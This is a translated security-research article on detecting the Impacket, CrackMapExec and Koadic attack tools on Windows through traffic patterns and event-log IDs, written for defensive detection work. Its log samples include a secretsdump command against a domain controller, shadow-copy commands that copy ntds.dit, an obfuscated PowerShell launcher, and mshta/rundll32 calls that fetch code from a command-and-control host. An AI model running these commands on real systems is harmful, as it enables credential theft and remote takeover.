How to detect an attack on Windows infrastructure: studying hacker tools


The number of attacks on the corporate sector grows every year: for example, in 2017, 13% more unique incidents were recorded than in 2016, and by the end of 2018 there were 27% more incidents than in the previous period. Among them are those in which the main working tool is the Windows operating system. In 2017-2018 the APT groups Dragonfly, APT28 and MuddyWater carried out attacks on government and military organisations in Europe, North America and Saudi Arabia. They used three tools for this: Impacket, CrackMapExec and Koadic. Their source code is open and available on GitHub.

It is worth noting that these tools are not used for the initial intrusion but for developing the attack inside the infrastructure. Attackers use them at different stages of an attack after the perimeter has been breached. This, by the way, is hard to detect, and often only with the help of technologies that identify traces of compromise in network traffic, or tools that can detect the attacker's active movements after they have entered the infrastructure. The tools provide a variety of functions, from transferring files to interacting with the registry and executing commands on a remote machine. We studied these tools to determine their network activity.

What we needed to do:

  • Understand how the hacking tools work. Find out what attackers need in order to exploit them and which technologies they can use.
  • Find what information security tools miss in the first stages of an attack. The reconnaissance stage may be skipped, either because the attacker is an insider or because the attacker exploits a previously unknown hole in the infrastructure. It becomes possible to recover the whole chain of their actions, hence the desire to detect further movement.
  • Eliminate false positives in intrusion detection tools. We must not forget that when certain actions are detected on the basis of reconnaissance alone, frequent errors are possible. Usually an infrastructure contains enough ways, indistinguishable at first glance from legitimate ones, to obtain any information.

What do these tools give attackers? In the case of Impacket, attackers get a large library of modules that can be used at different stages of the attack following the perimeter breach. Many tools use Impacket modules internally, for example Metasploit. It has dcomexec and wmiexec for remote command execution, and secretsdump for obtaining accounts from memory, all added to Impacket. As a result, correctly detecting the library's activity will ensure detection of its derivatives.

It is no accident that the creators of CrackMapExec (or simply CME) wrote "Powered by Impacket" about it. In addition, CME has ready-made functionality for popular scenarios: Mimikatz for obtaining passwords or their hashes, running a Meterpreter or Empire agent for remote execution, and Bloodhound on board.

The third tool we chose is Koadic. It is quite recent, presented at the international hacker conference DEFCON 25 in 2017, and is distinguished by a non-standard approach: it works over HTTP, JavaScript and Microsoft Visual Basic Script (VBS). This approach is called living off the land: the tool uses a set of dependencies and libraries built into Windows. The creators call it COM Command & Control, or C3.

IMPACKET

Impacket's functionality is very broad, from reconnaissance inside AD and collecting data from internal MS SQL servers to techniques for obtaining credentials: the SMB relay attack, and obtaining the ntds.dit file containing user password hashes from the domain controller. Impacket also executes commands remotely using four different methods: WMI, the Windows Scheduler management service, DCOM and SMB, and it requires credentials to do so.

Secretsdump

Let us look at secretsdump. This module can target both user machines and domain controllers. It can be used to obtain copies of the LSA, SAM, SECURITY and NTDS.dit memory areas, so it can be seen at different stages of an attack. The first step in the module's operation is authentication via SMB, which requires either the user's password or its hash, in which case a Pass-the-Hash attack is carried out automatically. Next comes a request to open access to the Service Control Manager (SCM) and obtain access to the registry via the winreg protocol, using which the attacker can get the data of the branches of interest and receive the results via SMB.

In Fig. 1 we see that, when the winreg protocol is used, access is obtained via the registry key with LSA. To do this, the DCERPC command with opcode 15 - OpenKey is used.

Fig. 1. Opening a registry key using the winreg protocol

Next, once access to the key has been obtained, the values are saved with the SaveKey command with opcode 20. Impacket does this in a very specific way. It saves the values to a file whose name is a string of 8 random characters with .tmp appended. In addition, the subsequent upload of this file takes place via SMB from the System32 directory (Fig. 2).

Fig. 2. Scheme of obtaining a registry key from a remote machine

It turns out that such activity on the network can be detected by queries to certain registry branches via the winreg protocol, by specific names, commands and their order.

This module also leaves traces in the Windows event log, making it easy to detect. For example, as a result of executing the command

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

in the Windows Server 2016 log we will see the following key sequence of events:

1. 4624 - remote logon.
2. 5145 - checking access rights to the remote winreg service.
3. 5145 - checking access rights to a file in the System32 directory. The file has the random name mentioned above.
4. 4688 - creation of a cmd.exe process that launches vssadmin:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 - process creation with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

6. 4688 - process creation with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit %SYSTEMROOT%\Temp\rmumAfcn.tmp ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

7. 4688 - process creation with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

Smbexec

Like many post-exploitation tools, Impacket has modules for executing commands remotely. We will focus on smbexec, which provides an interactive command shell on the remote machine. This module also requires authentication via SMB, either with a password or with a password hash. Fig. 3 shows an example of how such a tool works, in this case the local administrator console.

Fig. 3. Interactive smbexec console

The first step of smbexec after authentication is to open the SCM with the OpenSCManagerW (15) command. The request is notable: the MachineName field is DUMMY.

Fig. 4. Request to open the Service Control Manager

After that, a service is created with the CreateServiceW command (12). In the case of smbexec we see the same command construction logic every time. In Fig. 5, green marks the command parameters that do not change, and yellow what the attacker can change. It is easy to see that the name of the executable file, its directory and the output file can be changed, but the rest is much harder to change without breaking the logic of the Impacket module.

Fig. 5. Request to create a service via the Service Control Manager

Smbexec also leaves an obvious trace in the Windows event log. In the Windows Server 2016 log, for the interactive command shell with the ipconfig command, we will see the following key sequence of events:

1. 4697 - installation of a service on the victim machine:

%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

2. 4688 - creation of a cmd.exe process with the arguments from point 1.
3. 5145 - checking access rights to the __output file in the C$ directory.
4. 4697 - installation of a service on the victim machine.

%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 - creation of a cmd.exe process with the arguments from point 4.
6. 5145 - checking access rights to the __output file in the C$ directory.

Impacket is the basis on which attack tools are developed. It supports almost all protocols in a Windows infrastructure and at the same time has its own characteristic features: specific winreg requests, use of the SCM API with a characteristic command construction, the file name format, and the SMB share SYSTEM32.

CRACKMAPEXEC

The CME tool is designed to automate the routine actions an attacker has to perform to advance inside the network. It allows working in conjunction with the well-known Empire agent and Meterpreter. To execute commands covertly, CME can obfuscate them. Using Bloodhound (a separate reconnaissance tool), an attacker can automate the search for an active domain administrator session.

Bloodhound

Bloodhound, as a standalone tool, enables advanced reconnaissance inside the network. It collects data about users, machines, groups and sessions and is supplied as a PowerShell script or a binary file. LDAP or SMB-based protocols are used to collect the information. The CME integration module allows Bloodhound to be downloaded onto the victim machine, run, and the collected data received after execution, thereby automating the actions on the system and making them less noticeable. The Bloodhound graphical shell presents the collected data as graphs, which makes it possible to find the shortest path from the attacker's machine to the domain controller.

Fig. 6. Bloodhound interface

To run on the victim machine, the module creates a task using ATSVC and SMB. ATSVC is an interface for working with the Windows Task Scheduler. CME uses its NetrJobAdd(1) function to create tasks over the network. An example of what the CME module sends is shown in Fig. 7: it is a cmd.exe call command together with obfuscated code in the form of arguments in XML format.

Fig. 7. Creating a task via CME

After the task is submitted for execution, the victim machine launches Bloodhound itself, and this can be seen in the traffic. The module is characterised by LDAP queries to obtain the standard groups and the list of all machines and users in the domain, and by obtaining information about active user sessions via the SRVSVC NetSessEnum request.

Fig. 8. Obtaining the list of active sessions via SMB

In addition, launching Bloodhound on the victim machine with auditing enabled is accompanied by an event with ID 4688 (process creation) and the process name «C:\Windows\System32\cmd.exe». What is notable about it are the command line arguments:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "
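An added example (not from the article or from CME) of what an analyst can do with that command line: resolve the $env:COMSPEC[4,26,25]-join'' trick against the host's COMSPEC value, which yields the iex alias, and decode the [char[]](...) array. The sample command line is constructed from the one above and is cut where the article truncates it, so only the visible prefix is decoded; the COMSPEC value is an assumption.

```python
import re

# Constructed sample: the 4688 command line shown above, with the char array
# cut where the article truncates it, so only the visible prefix is decoded.
SAMPLE_4688 = (
    'cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & '
    "( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 )"
    "-jOIN'' ) \""
)
# Assumed environment of the monitored host (default COMSPEC path).
SAMPLE_ENV = {"COMSPEC": r"C:\Windows\system32\cmd.exe"}

# $env:<NAME>[i,j,k]-join''  builds a cmdlet name from characters of an env var
# (PowerShell treats both the variable name and the result case-insensitively).
ENV_INDEX = re.compile(r"\$env:(\w+)\[([\d,\s]+)\]\s*-join\s*''", re.IGNORECASE)
# [char[]](n, n, ...)  hides the script body as an array of code points.
CHAR_ARRAY = re.compile(r"\[char\[\]\]\s*\(\s*([\d\s,]+)\)", re.IGNORECASE)


def deobfuscate(cmdline, env):
    """Resolve both tricks; return None when the env-index pattern is absent."""
    m = ENV_INDEX.search(cmdline)
    if not m:
        return None
    value = env.get(m.group(1).upper(), "")
    indices = [int(i) for i in m.group(2).split(",")]
    try:
        alias = "".join(value[i] for i in indices)
    except IndexError:                       # env var shorter than the indices assume
        alias = ""
    decoded = ["".join(chr(int(c)) for c in arr.split(","))
               for arr in CHAR_ARRAY.findall(cmdline)]
    return {"alias": alias, "decoded": decoded}


def is_suspicious(cmdline, env):
    """True when the resolved alias is Invoke-Expression and a char-array body exists."""
    r = deobfuscate(cmdline, env)
    return bool(r) and r["alias"].lower() in ("iex", "invoke-expression") and bool(r["decoded"])


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_4688, SAMPLE_ENV))   # alias 'iex', decoded ['[Net.Se']
```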

Enum_avproducts

The enum_avproducts module is very interesting from the point of view of its functionality and implementation. WMI allows the WQL query language to be used to retrieve data from various Windows objects, and this is exactly what this CME module uses. It generates queries to the AntiSpywareProduct and AntiVirusProduct classes about the protection tools installed on the victim machine. To get the required data, the module connects to the root\SecurityCenter2 namespace, then issues a WQL query and receives the response. Fig. 9 shows the contents of such requests and responses. In our example, Windows Defender was found.

Fig. 9. Network activity of the enum_avproducts module

WMI auditing (Trace WMI-Activity), whose events can contain useful information about WQL queries, is often disabled. But if it is enabled, then when the enum_avproducts script is run, an event with ID 11 will be recorded containing the name of the user who sent the request and the name in the root\SecurityCenter2 namespace.

Each CME module had its own artefacts, whether specific WQL queries, the creation of a certain kind of task in the task scheduler with obfuscation, or Bloodhound-specific activity over LDAP and SMB.

KOADIC

A distinctive feature of Koadic is its use of the JavaScript and VBScript interpreters built into Windows. In this sense it follows the living off the land trend: it has no external dependencies and uses standard Windows tools. It is a full-featured Command & Control (CnC) tool, since after infection an "implant" is installed on the machine, allowing it to be controlled. Such a machine, in Koadic terminology, is called a "zombie". If the privileges on the victim's side are insufficient for full operation, Koadic can elevate them using User Account Control bypass techniques (UAC bypass).

Fig. 10. Koadic shell

The victim must initiate communication with the Command & Control server. To do this, it contacts a pre-prepared URI and receives the main Koadic body using one of the stagers. Fig. 11 shows an example for the mshta stager.

Fig. 11. Initiating a session with the CnC server

From the WS variable in the response it is clear that execution takes place via WScript.Shell, and the STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH and EXPIRE variables contain key information about the parameters of the current session. This is the first request-response pair in the HTTP connection with the CnC server. Subsequent requests relate directly to the functionality of the called modules (implants). All Koadic modules work only with an active session with the CnC.

Mimikatz

Just as CME works with Bloodhound, Koadic works with Mimikatz as a separate program and has several ways of launching it. Below is a request-response pair for downloading the Mimikatz implant.

Fig. 12. Transferring Mimikatz in Koadic

You can see how the URI format in the request has changed. It now contains the value of the csrf variable, which identifies the selected module. Do not pay attention to its name; we all know that CSRF is usually understood differently. The response was the same main Koadic body, with the Mimikatz-related code added. It is quite large, so let us look at the key points. Here we have the Mimikatz library encoded in base64, a serialized .NET class that will inject it, and the arguments for launching Mimikatz. The result of execution is transmitted over the network in clear text.

Fig. 13. Result of running Mimikatz on a remote machine

Exec_cmd

Koadic also has modules that can execute commands remotely. Here we will see the same URI generation method with the familiar sid and csrf variables. In the case of the exec_cmd module, code capable of executing shell commands is added to the body. Below is such code contained in the HTTP response of the CnC server.

Fig. 14. exec_cmd implant code

The GAWTUUGCFI variable with the familiar WS attribute is needed for code execution. With its help the implant calls the shell, handling two branches of code: shell.exec with return of the output data stream, and shell.run without return.

Koadic is not a typical tool, but it has its own artefacts by which it can be found in legitimate traffic:

  • the special formation of HTTP requests,
  • use of the winHttpRequests API,
  • creation of a WScript.Shell object via ActiveXObject,
  • a large executable body.

The initial connection is initiated by the stager, so its activity can be detected via Windows events. For mshta this is event 4688, which indicates process creation with the launch attribute:

C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6

While Koadic is running, you can see other 4688 events with attributes that characterise it perfectly:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

Findings

Living off the land is becoming more popular among criminals. They use the tools and mechanisms built into Windows for their own needs. We see the popular tools Koadic, CrackMapExec and Impacket, which follow this principle, appearing more and more often in APT reports. The number of forks of these tools on GitHub is also growing, and new ones are appearing (there are already about a thousand of them now). The trend is gaining popularity because of its simplicity: attackers do not need third-party tools. We focus on studying network communication: each tool described above leaves its own trace in network traffic, and a detailed study of them allowed us to teach our product PT Network Attack Discovery to detect them, which ultimately helps investigate the whole chain of cyber incidents involving them.

Authors:

  • Anton Tyurin, Head of Expert Services Department, PT Expert Security Center, Positive Technologies
  • Egor Podmokov, expert, PT Expert Security Center, Positive Technologies

Source: www.habr.com
